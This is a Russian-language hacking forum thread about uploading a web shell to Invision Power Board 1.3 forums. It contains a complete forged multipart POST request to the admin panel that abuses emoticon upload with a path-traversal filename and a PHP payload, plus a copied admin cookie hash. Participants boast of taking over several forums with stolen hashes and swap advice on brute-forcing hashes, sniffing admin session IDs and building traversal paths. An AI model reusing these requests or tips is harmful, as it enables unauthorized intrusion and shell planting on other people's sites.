|
Залить шелл через подделку http запросов, на примере ipb 1.3
Вот Я дошёл до того момента где нужно залить шелл :) прав на папке со смайлами конечно же не оказалось...
POST http://someSiteForum/admin.php?adses...1f59424a4e96f7 HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://someSiteForum/admin.php?adses...ct=op&code=emo Accept-Language: ru Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Length: 677 Pragma: no-cache Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798; -----------------------------7d43942c405bc Content-Disposition: form-data; name="adsess" 7456d367b18da87d161f59424a4e96f7 -----------------------------7d43942c405bc Content-Disposition: form-data; name="code" emo_upload -----------------------------7d43942c405bc Content-Disposition: form-data; name="act" op -----------------------------7d43942c405bc Content-Disposition: form-data; name="MAX_FILE_SIZE" 10000000000 -----------------------------7d43942c405bc Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php" Content-Type: application/octet-stream <% echo("Hello from injected PHP script") %> -----------------------------7d43942c405bc-- Всё понятно, но как указать локальный путь до файла, как он поймёт что Я именно хочу загрузить? :confused: |
А если у тебя хэш cf20fc37b4g0be45c1336f29d444e798 и id то разве нельзя потделать куки вместо http запроса? и зайти админом ? :) Или я что то путаю?
|
Да это само собой, Я уже в админке, но мне не форум нужен :)
|
да я тоже взламываю форум и хочу болше как залит шелл ???????
|
аа.. всё торможу как всегда =) Да. Меня тоже вопрос волнует этот. Где пареметры на локальный адрес.. :confused:
|
Algol, пожалуйста, обрати внимание! =\
|
Ну просто много LOL!!!!!!!
Ага щас он вам поможет!!!! LOL!!!!!!! :D :D :D :D :D :D :D :D |
Ну он же эту статью писал (про ipb1.3) он должен знать...
|
ну что никто неотвечает? Вообще последнее время что то нету активного народа не форуме....
|
Цитата:
А вот это PHP код:
|
Рзве текст шела влезет в инеткряк?
|
Да стати когда ставиш относительный путь типа "../../my.php" то он файл не создает, хотя директория доступна на запись, сам выставлял права, т.е. естил на своем форуме.
|
Цитата:
|
народ получил хэш захожу под админом все ок, а в admin.php нужен пароль, перебрал кучу словарей кароче кирдык, как можно в админку залесть зная хэш админa?
|
с этим скриптом выдает ошибку
id='description'>You must have administrative access to successfully log into the Invision Board Admin CP.<br>Please enter your forums username and password below<br><br><span style='color:red;font-weight:bold'>Could not retrieve session record</span></div> <!--IPB.ERROR--> <!--IPB.MESSAGE--> прально ли я понял? POST http*://site.com/forum/admin.php?adsess=ид сесия? HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http*://site.com/forum/admin.php?ид сесия?&act=op&code=emo Accept-Language: ru Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Content-Length: 677 Pragma: no-cache Cookie: member_id=ид админа; pass_hash=тут понято; -----------------------------7d43942c405bc Content-Disposition: form-data; name="adsess" ид сесия? -----------------------------7d43942c405bc Content-Disposition: form-data; name="code" emo_upload -----------------------------7d43942c405bc Content-Disposition: form-data; name="act" op -----------------------------7d43942c405bc Content-Disposition: form-data; name="MAX_FILE_SIZE" 10000000000 -----------------------------7d43942c405bc Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../forum/uploads/lol.php" Content-Type: application/octet-stream нада еще что то менять? и дальше где исходник шела нада с ковычками? или просто (исходинк)? |
мдя =)
Этот путь указан неверно. ../../forum/uploads/lol.php ../../ <-это означает что файл заливается на 2 дириктории вниз (блеже к корневой) допустим www.lol.ru/dir1/dir2/dir3/admin.php находясь в админпхп чтобы залить файл в dir2 надо указать путь ../../upload_file чтобы в dir1 то ../../../upload_file Вот так если я нечего непутаю. Второе у тебя нехватает самого аплоада <% echo("php script") %> -----------------------------7d43942c405bc-- |
без расшифровки пароля залить шелл не получится. Ты админский пароль расшифровал?
|
для этого он и подделывает запрос. чтобы хэш нерасшифровывать. тут может помешать только чмод.
|
Цитата:
|
ну ептель тогда нет смысла париться с этими паками :\
|
Цитата:
А так.. остается только брутить хэш. С одними куками не справишься. |
BlackPrince
Мега респект за такую мазу!!! это реальная тема! |
я так понял где я писал ид сесия нужен адсес? где такой взять? или можно как то снифером тоже украсть этот адсес?
блин такая беда где то в 5 форумом проник админами а пороли не расшифровываются :( подскажите как еще можно проникнуть в admin.php |
народ а как узнать за чмодена папка или нет? узнал я адсес все без ошибок но не заливат, может путь не прально указал, на сайте так www.site.ru/forum/ а ставлю так ../../uploads/lol.php правильный этот путь? и я что-то не нашол где в админке можно включить чтоб заливались свои аватары =(
|
Вы вообще понимаете что именно происходит? :confused:
Вот прибавь к любому форуму это оканчание. Код HTML:
admin.php?adsess=Вот появится верефикация твоего пассворда. Когда вставишь правильный пассворд, форум пошлёт на базу, проверит, если пассворд правильный, сгенерирует тебе НОВУЮ сессии, и только ТОГДА ты сможешь что небудь делать в Админке. Вот так работает. А без этой новой сессии ты там нечиго зделать не сможешь. |
ну я сам сижу в админке и копирую этот адсес, его принцып я понял, кода меняешь айпи тебя выкидывает с админки кода занаво заходиш то адсес меняется, тоесть адсес еще прикручен и к айпи и к паролю, но это все понятно не понятно одно как залить шелл?
|
| Время: 01:40 |